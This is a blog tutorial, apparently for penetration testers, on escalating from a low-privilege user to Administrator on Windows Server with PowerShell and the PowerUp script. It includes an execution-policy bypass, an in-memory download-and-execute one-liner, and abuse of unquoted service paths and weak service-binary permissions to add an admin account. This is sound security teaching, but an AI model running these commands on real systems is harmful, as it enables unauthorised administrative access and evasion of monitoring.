Privilege Escalation Using PowerShell

Sharing is caring!

privilege escalation using powershell hacknpentest

During Red Team Assessment and penetration testing, we always encounter a situation where we get a low privilege shell and for extracting juicy information or to move forward in the network we need to escalate our privileges. The task becomes very tedious when it comes to Windows boxes. So here I will be sharing some techniques to escalate our privileges from a normal user to Administrator using PowerShell.

Why PowerShell?

PowerShell is an open-source, task-based command-line shell and scripting language built on the .NET framework. As it is a scripting language it can be used to automate a various task like managing remote Servers, Administrating HyperV feature in Windows Server, etc. It is a Microsoft product and is default installed in every Windows boxes so it is very helpful in escalating our privileges.

Let’s just focus on the practical part and get our hands dirty ????

Note: The environment we have deployed here is fully patched, no exploits work against the Windows Server 2016 [until the day of writing].

Privilege Escalation Part 1:

Migrating to PowerShell:

First, we try to convert the low privilege command prompt (we have access) to a PowerShell prompt. This conversion does not escalate our privileges, we are just migrating to PowerShell.

get-executionpolicy in PowerShell
Migrating to Powershell & Checking the Powershell Version

In the Corporate environment, PowerShell is highly monitored using ACL’s, Command history, System Center Configuration Manager [SCCM] etc ( we will be updating a separate blog dedicated to Bypassing Advanced Security Controls), the execution policy is default set-ted to be Restricted. We need to bypass the execution policy to make our way ahead.

get-executionpolicy in PowerShell

powershell -ep bypass
PowerShell bypass tutorial

Enumerating the current privileges of the user, we have access to.

whoami /priv
whoami in powershell

net localgroup administrators
whoami in powershell
Current user is not a member of administrators group

Now, we will use the Powerup Script (https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1) by Harmj0y to escalate our privileges. We have two ways to achieve the task, first to directly download the script to the system (more noisy as it may alert security controls) or we can have it directly into the memory (less noisy and more preferable). We will be using both but the second one is most preferred.

We can directly download the file to the memory using the following command as follows:-

iex (New-Object Net.WebClient).DownloadString(‘http://192.168.1.5/PowerUp.ps1’)

This command will directly download the file to the memory and doesn’t touch the disk.

We download the PowerUp.ps1 script from the above link and transfer it to our Windows Server.

iex (New-Object Net.WebClient).DownloadFile(‘http://192.168.1.6/PowerUp.ps1′,’C:\Users\Flopster\PowerUp.ps1’)powersehll-exploit-powerup2

Once the script is downloaded, we Invoke the script using dot parsing as shown below (this technique is noisy as we are directly downloading script into the disk).

.  .\PowerUp.ps1

powersehll-exploit-powerup3

It can throw a warning but it is fine. Now we target service misconfiguration in sequential order.

1. Unquoted service Path Vulnerability

Powerup’s Get-ServiceUnquoted function searches all the service path and returns a set of service which has insecure path misconfigured during installation.

windows-server-privilege-excalation

Horray! We have found out some vulnerable services. Now we will leverage this to escalate our privileges to Administrator.

Let’s use the Write-ServiceBinary function to abuse the exacqVisionServer service. This cmdlet simply alters the binary path of the service and add a local user john with password Password123! and adds it to the local administrators group.

Write-ServiceBinary -ServiceName ‘exacqVisionServer’ -Verbose

powersehll-exploit-powerup-4

The executable path of the service needs to be changed, we rename service.exe to exacq.exe and place it under C:\Program Files\exacq.exe. So, that when the service starts, it picks up the altered path and as directed executes our exacq.exe binary which in turn make a user which is also a member of administrators group.

powersehll-exploit-powerup-5

Place the binary in the actual path after renaming it as directed below:

powersehll-exploit-powerup-6

To reflect the new changes to occur, we need to stop and restart the service.

powersehll-exploit-powerup-7

This is because of the low privileged user who do not have access to perform any actions on the service. We will reboot the server and then wait for the service to auto start.

powersehll-exploit-powerup-8

powersehll-exploit-powerup-9

After a quick reboot, we can see that a new user “john” is present with administrative privileges.

powersehll-exploit-powerup-10

powersehll-exploit-powerup-11

2. Service Executable Weak Permissions

         Let’s hunt down the service executables which does not have secure permissions set and are running with elevated privileges. PowerUp’s Get-serviceEXEPerms function can find all the services where the current user can alter or write the associated binary. A service executable with weak permissions will look like:

powersehll-exploit-powerup-13

We have found a service which is misconfigured in a way that it can be abused.

powersehll-exploit-powerup-14

It is very clear that the current user has Full permissions on the exacqd.exe binary. We will now check the status of the service.

powersehll-exploit-powerup-15

The service is running and we got a lot of juicy information about the service. We will use the Write-ServiceEXE cmdlet to abuse the service. We can have a look at the abuse function examples from the following Get-Help command as follows:-

Get-Help Write-ServiceEXE -Examples

powersehll-exploit-powerup-16

Finally abusing the service from the following command:

Write-ServiceEXE -ServiceName exacqVisionServer -Verbose

binary for services

As we do not have privileges to perform any action on the service. We simply restart the system to take affect the changes.

And BOOM! We have escalated our privileges to administrator.

powersehll-exploit-powerup-18

John is a member of the administrators group and we can verify it as follows:

net user john

powersehll-exploit-powerup-19

We have seen a number of ways in which some misconfigured services can be abused. A number of misconfigurations and bad practices can give the attacker an opportunity to escalate privileges and execute arbitrary code. We have also seen that how we can leverage such misconfigurations using only Powershell.

 

We will be covering some other attack methods using PowerShell in another blog post which is useful while performing penetration testing on a corporate network.

 

References:

#https://docs.microsoft.com/en-us/powershell/scripting/overview?view=powershell-6
#https://medium.com/@SumitVerma101/windows-privilege-escalation-part-1-unquoted-service-path-c7a011a8d8ae
#https://adsecurity.org/

Share

You may also like...

13 Responses

  1. Avatar Avnish says:

    Its very nice walkthrough of windows privilege escalation through powershell.
    Its such a wonderful work..
    Sir

  2. Avatar Harshal Harbak says:

    Superb Write up????
    In a very precised & Simplified manner.
    Keep it up ☺️????????

  3. Avatar Aviral Jain says:

    Good Job! Nice explanation
    Waiting for more updates.

  4. Avatar Amit Dwivedi says:

    Excellent walk through and good informative content to understand exactly how things happened !! Over all complete package.

  5. Avatar Akshay says:

    Thoroughly explained. Way to go Yash!

  6. Avatar WillyWonker says:

    Amazing blog keep up the great work

  1. 29th June 2019

    In order to gather credentials and hash, administrator privilege will be needed and how to escalate privileges in windows environment can be found on this awesome blog.

Leave a Reply

Your email address will not be published. Required fields are marked *